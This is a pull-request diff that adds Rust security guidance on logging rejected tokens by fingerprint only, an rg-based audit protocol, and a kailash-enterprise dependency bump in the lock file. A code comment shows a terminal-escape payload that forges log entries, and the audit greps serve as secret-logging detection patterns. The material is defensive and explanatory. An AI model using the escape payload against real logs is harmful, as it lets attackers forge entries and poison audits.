+// DO — fingerprint raw content; log key + hash
+fn log_rejected_token(token: &str) {
+    let fingerprint = format!("{:04x}", simple_hash(token) & 0xFFFF);
+    tracing::warn!(
+        fingerprint = %fingerprint,
+        len = token.len(),
+        "rejected token failed validation"
+    );
+}
+
+fn log_identifier_rejection(identifier: &str) {
+    // Only length and fingerprint — the raw identifier is a stored-XSS /
+    // log-injection vector if it contains \n\rESC or terminal escapes.
+    let fingerprint = format!("{:04x}", simple_hash(identifier) & 0xFFFF);
+    tracing::warn!(fingerprint = %fingerprint, "identifier failed validation");
+}
+
+// DO NOT — log the raw rejected content
+fn log_rejected_token(token: &str) {
+    tracing::warn!("rejected token: {}", token);
+    // Attacker sets token to "\x1b[2J\x1b[H<fake admin log line>" — their
+    // fake line is now in the log stream, indistinguishable from real entries.
+}
+```
+
+**Why**: Raw content in logs is three problems in one. (1) Control-character injection lets attackers forge log entries. (2) Secret exfiltration — rejected tokens are still credential material and logging them moves them into wider-access log pipelines. (3) Audit poisoning — forged log lines corrupt investigations. Fingerprint-only logging gives operators enough to correlate requests without any of the attack surface.
+
+See also: `rules/dataflow-identifier-safety.md` MUST Rule 2 — `IdentifierError` messages MUST NOT echo the raw input verbatim.
+
+## Audit Protocol
+
+Run before every release touching network-facing crates:
+
+```bash
+# 1. HTTP MCP servers must have origin validation
+rg 'async fn handle.*Request' crates/kailash-nexus/src/mcp/ crates/kailash-mcp/ -B 2 -A 20 | \
+  rg -v 'allowed_origins|origin.*allow|origin.*check'
+# Non-empty result = HIGH if the handler dispatches any JSON-RPC method
+
+# 2. Stdio spawn sites must use a validated spec
+rg 'Command::new|tokio::process::Command::new' crates/ -B 3 -A 10 | \
+  rg -v 'allowed_commands|CommandSpec|validate'
+# Non-empty result = HIGH for any site spawning from caller-supplied input
+
+# 3. Log calls including raw credential/token/identifier content
+rg 'warn!|error!|info!' crates/ | rg -i 'token|password|secret|api_key|identifier.*{}'
+# Any format-interpolation of these names = MEDIUM+; convert to fingerprint logging
+```
+
+Any finding is blocking — ship the fix, add a regression test, open an issue on the upstream kailash-py if the same class exists cross-SDK.
+
+## Related
+
+- `skills/18-security-patterns/fail-closed-defaults-rs.md` — allowlist defaults
+- `skills/18-security-patterns/constant-time-comparison-rs.md` — credential equality
+- `rules/dataflow-identifier-safety.md` — fingerprint-only identifier error messages
+- `rules/security.md` — top-level rules
+- `crates/kailash-nexus/src/mcp/auth.rs` — reference HTTP transport with origin check
+- `crates/kailash-mcp/src/transport/stdio.rs` — reference stdio spawn with allowlist

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -22,7 +22,7 @@ classifiers = [
 ]
 dependencies = [
     # Kailash Enterprise (Rust-backed, all-in-one: Core SDK + DataFlow + Nexus + Kaizen + Enterprise)
-    "kailash-enterprise>=3.12.0",
+    "kailash-enterprise>=3.15.1",
     # CLI Framework
     "click>=8.0",
     "rich>=13.0.0",

--- a/uv.lock
+++ b/uv.lock
@@ -496,21 +496,21 @@ wheels = [
 
 [[package]]
 name = "kailash-enterprise"
-version = "3.12.0"
+version = "3.15.1"
 source = { registry = "https://pypi.org/simple" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/4f/33/35b245bf34969b6d9e413a3062eca1cf1021478893ad2856e2248602a298/kailash_enterprise-3.12.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:1d46fc998380a7d03348dc9e036eee6848dc5a292502ae5661a77e84f0f22d7d", size = 13727701, upload-time = "2026-04-07T14:53:33.282Z" },
-    { url = "https://files.pythonhosted.org/packages/19/46/2ef87ea17eebe8908d37da5bc20aab6b90efbb544805df8019bb156c2cca/kailash_enterprise-3.12.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:3eb85c0a626cdc373e8becf981015d13e7e81b13b6ebf169fdc5d701d0fe695f", size = 14780127, upload-time = "2026-04-07T14:53:36.793Z" },
-    { url = "https://files.pythonhosted.org/packages/de/2f/da168a9fed7bfb16eb9410f5b68d36fa0f5ba7c6f0fb5c374cee07d2085e/kailash_enterprise-3.12.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:13e19f04024f45c56f1e761ed9e5ead76649c8393945b549e39cab198140d6db", size = 15945804, upload-time = "2026-04-07T14:53:40.379Z" },
-    { url = "https://files.pythonhosted.org/packages/7f/00/ce7a1f74707a356496a9d27cdba7943468278d7bd5df6874d8bd835421f1/kailash_enterprise-3.12.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1bf582ccb0a8cd102ec8cb9099b1a963205a7f9440c477de004319e6be93f372", size = 13728782, upload-time = "2026-04-07T14:53:44.142Z" },
-    { url = "https://files.pythonhosted.org/packages/13/1e/cc1d0f9be372060f90526037f432e1191479c2f1d5651cbd7bb76f173f53/kailash_enterprise-3.12.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:af6f5e72bb57793c3c69d468ede7b7d56de00bf455e90a4b54cd28c4a9f17259", size = 14779982, upload-time = "2026-04-07T14:53:48.057Z" },
-    { url = "https://files.pythonhosted.org/packages/d2/1a/6a11314585871c16821339ce8acd357aea629c925d71e950398cfcc93464/kailash_enterprise-3.12.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:3af3c187d27cb349a659dde1f8d5e5708df7b76e5def191c03b27fc4509edb8f", size = 15946103, upload-time = "2026-04-07T14:53:51.834Z" },
-    { url = "https://files.pythonhosted.org/packages/0d/29/b9a9add7cae03d75aafb93bb6c817051a4ff12f38da5b580d8dab2194dcc/kailash_enterprise-3.12.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:6d99116bbd1ee469937eb28dabc2072b73f4908662214ae189885f1e9ba5db7f", size = 13662249, upload-time = "2026-04-07T14:53:55.283Z" },
-    { url = "https://files.pythonhosted.org/packages/5e/74/277c2e115279c2f3bfea1835ac6b6bafdeda8b186fb7ba51f3f3f613420a/kailash_enterprise-3.12.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:1d4a8192b257a938a1700f0e804de7b200c766c5fdba198cd00c99dc9b5b8af8", size = 14786786, upload-time = "2026-04-07T14:53:58.757Z" },
-    { url = "https://files.pythonhosted.org/packages/e5/d2/99262714f9e59f20d9614383fcf352eec561227e7ef4fb2e26c3721ba290/kailash_enterprise-3.12.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:f9d3addf911e339dcef76c1615dcd2aefdef70905fbea7cea4f121c04023d2e4", size = 15940573, upload-time = "2026-04-07T14:54:02.243Z" },
-    { url = "https://files.pythonhosted.org/packages/88/e0/1cb8a1497ac2ad4d0f95d41f7a9e7d43df7d266f80b44bafb2fc44945a93/kailash_enterprise-3.12.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:1f3ddc0ae2ef8091869aca6a0b73b12834ffdd640cbb7dc87b5e70ef6cdcb301", size = 13666236, upload-time = "2026-04-07T14:54:05.735Z" },
-    { url = "https://files.pythonhosted.org/packages/74/ab/e423239e7a72a01d1af4904d25c4db391d9fa306b90bc96ac57c6dda96a8/kailash_enterprise-3.12.0-cp313-cp313-manylinux_2_28_aarch64.whl", hash = "sha256:64e13c4f145ee67c1f23e00af237d1b25a4cfe469da717fea1c3beeab2be8694", size = 14786465, upload-time = "2026-04-07T14:54:09.397Z" },
-    { url = "https://files.pythonhosted.org/packages/49/78/901f523ebdbea8e17c56d3cb0206adb4797ae7e1bb5f17626a895217b0f4/kailash_enterprise-3.12.0-cp313-cp313-manylinux_2_28_x86_64.whl", hash = "sha256:9d7a9bc18d4eadb49697ec68ded1f1ccf2531c2808b8bd6acdef67d0b8c13ab9", size = 15942905, upload-time = "2026-04-07T14:54:13.098Z" },
+    { url = "https://files.pythonhosted.org/packages/82/3e/5a7983d493246269a4068299b57c821ad5d2aafa2350d24d3afbe13b2126/kailash_enterprise-3.15.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0e55b7cda04fb3047d41da3ee5b67430d7461a8fbab589f87b9c276000def184", size = 14090057, upload-time = "2026-04-12T21:53:18.052Z" },
+    { url = "https://files.pythonhosted.org/packages/e8/42/acfb043a80575a08a2c613989953d1a1241a1e97b964248850ad25208e13/kailash_enterprise-3.15.1-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:63c2cbd018523619d04ab3e1ef1cbd384cf624ab00f960b66d2183ecd07178d2", size = 15181123, upload-time = "2026-04-12T21:53:21.212Z" },
+    { url = "https://files.pythonhosted.org/packages/50/dc/153571f17bfb89404676a9dc294712f0cd567424d66c36177c63f00892e3/kailash_enterprise-3.15.1-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:f47f2eae56cba6200c95bb38a6cd4eaab27a2061438003985cf887f591c2dace", size = 16372544, upload-time = "2026-04-12T21:53:25.092Z" },
+    { url = "https://files.pythonhosted.org/packages/ef/72/67fa7e6252fe180152fc46dd2e4036c67a8d5d06ba3398da5fbd49b5591c/kailash_enterprise-3.15.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9de01de8172aa9432164d882f718b3a79fdb1f57f60974b9e02013cc355264b0", size = 14090100, upload-time = "2026-04-12T21:53:28.261Z" },
+    { url = "https://files.pythonhosted.org/packages/01/3d/cc27b5d921ddc749fcf25c369d09bc01579ff11fc3f08628ccc48997ded4/kailash_enterprise-3.15.1-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:0870c75f7feb0ce6e616cc7efcef42dd3a582f876dcf64f3d0bb4149d6d0d358", size = 15180395, upload-time = "2026-04-12T21:53:31.19Z" },
+    { url = "https://files.pythonhosted.org/packages/4d/05/ae741bdb52076dc3a718b1fd140c8304a52762abbc2bc0600be3af26556b/kailash_enterprise-3.15.1-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:31ef7971d20314c6059d5d9cef0266858fcb69ca685401e914238bfb622cf0cc", size = 16372512, upload-time = "2026-04-12T21:53:34.052Z" },
+    { url = "https://files.pythonhosted.org/packages/cb/5c/a986d8edb49815471d009a85974516f0a77fb7ea12585f11773d2cb64a5a/kailash_enterprise-3.15.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:551e50cb2ffb98e983fabbc6704f9fbc7526d22ef6e1f19f4fd1c58f240f98b8", size = 14018931, upload-time = "2026-04-12T21:53:37.108Z" },
+    { url = "https://files.pythonhosted.org/packages/93/cf/d10f1827e467c8b4fc82caaa2e7f3d8c7dbf2890d2fe4349d64b9ef8f04f/kailash_enterprise-3.15.1-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:e88ec114cfa48ba176ed2452e71f59f9e6d3abe0de8e13e1fd6edbce70937ac5", size = 15184888, upload-time = "2026-04-12T21:53:40.061Z" },
+    { url = "https://files.pythonhosted.org/packages/50/00/f58330f3dfc91304330e317cb25681a1443bfecaaa3e484d259f810c4ad9/kailash_enterprise-3.15.1-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:0dd804626585e69f31f891f1dcc9a99aeca7e4d1f76e5936700c563fc83262ad", size = 16371789, upload-time = "2026-04-12T21:53:42.932Z" },
+    { url = "https://files.pythonhosted.org/packages/43/d4/d3b83e9683bfe6b2928b3d6d2e7b6a44564b048e96c004b885795fabe3e1/kailash_enterprise-3.15.1-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:9cabb5ef4a8805dc51ed9d39e4f5ac33d3213a26a3ee5311bd21271f5a52156b", size = 14021367, upload-time = "2026-04-12T21:53:46.034Z" },
+    { url = "https://files.pythonhosted.org/packages/16/e9/36fac04c09a40e164d46c7d294056b1c3bcaf19361a4e1e3d989c209ba6a/kailash_enterprise-3.15.1-cp313-cp313-manylinux_2_28_aarch64.whl", hash = "sha256:3856ba9028d869c4a4ccb0c529b1cfa4c5a2d9f8111a046be62eb353eb8f730f", size = 15185448, upload-time = "2026-04-12T21:53:48.982Z" },
+    { url = "https://files.pythonhosted.org/packages/b5/23/6cbe7618da9e0d95f973d3886ef3fe215a512f8728c972a04719f095128b/kailash_enterprise-3.15.1-cp313-cp313-manylinux_2_28_x86_64.whl", hash = "sha256:42feff149478de31c96117855776b01183467371f6a3d561eeef71afb5064079", size = 16374813, upload-time = "2026-04-12T21:53:52.174Z" },
 ]
 
 [[package]]
@@ -747,7 +747,7 @@ requires-dist = [
     { name = "click", specifier = ">=8.0" },
     { name = "detect-secrets", marker = "extra == 'dev'", specifier = ">=1.5.0" },
     { name = "isort", marker = "extra == 'dev'", specifier = ">=5.12.0" },
-    { name = "kailash-enterprise", specifier = ">=3.12.0" },
+    { name = "kailash-enterprise", specifier = ">=3.15.1" },
     { name = "mypy", marker = "extra == 'dev'", specifier = ">=1.0" },
     { name = "pre-commit", marker = "extra == 'dev'", specifier = ">=4.2.0" },
     { name = "pytest", marker = "extra == 'dev'", specifier = ">=7.2.0" },


### PR DESCRIPTION
## Summary

- 3 new Rust security pattern sub-skills under `18-security-patterns/` (constant-time comparison, fail-closed defaults, network transport hardening)
- `rules/security.md` rewritten as the merged rs variant: loom global + Credential Decode Helpers Python section + 3 new Rust MUST clauses
- SKILL.md refreshed with Rust-Specific Sub-Files table and H1–H6 Red Team patterns
- `settings.json` description corrected from `(Python)` to `(Rust-backed bindings)`
- SDK pin `kailash-enterprise` 3.12.0 → 3.15.1

## Origin

Upstreamed from kailash-rs 3.15.1 `/codify` proposal dated 2026-04-13 covering R1 (journal 0018) and R3 (journal 0021) red team rounds.

## Test plan

- [x] `uv sync` runs clean — 2 packages updated
- [x] All 11 hooks in `settings.json` resolve to existing scripts
- [x] `.claude/VERSION` bumped to 2.7.0 with changelog entry
- [ ] CI passes on this branch

🤖 Generated with [Claude Code](https://claude.com/claude-code)